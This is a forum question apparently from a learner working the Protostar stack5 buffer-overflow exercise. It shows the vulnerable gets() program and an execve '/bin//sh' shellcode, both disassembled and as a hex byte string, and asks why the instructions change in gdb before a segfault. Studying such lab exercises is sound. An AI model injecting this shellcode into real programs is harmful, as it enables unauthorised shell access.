Hey I´m currently doing ProtoStar-Stack5 http://exploit-exercises.lains.space/protostar/stack5/ with following c-code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
Atm im trying to execute shellcode:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 89 c1 mov %eax,%ecx
8048071: 89 c2 mov %eax,%edx
8048073: b0 0b mov $0xb,%al
8048075: cd 80 int $0x80
8048077: 31 c0 xor %eax,%eax
8048079: 40 inc %eax
804807a: cd 80 int $0x80
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
when running the overflow in gdb(gef), it executes as expected until pushing the two strings (0x68732f2f and 0x6e69622f) onto the stack. After pushing the second string, the assembly changes from:
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0xb
int 0x80
to:
mov ebx,esp
mov ecx,eax
mov edx,eax
mov al,0x2f
bound ebp,QWORD PTR [ecx+0x6e]
das
das
jae 0xffffcee4
and then segfaults at bound ebp, QWORD PTR [ecx+0x6e]
My question now is, why it changes and if the change has to do with the segfault.
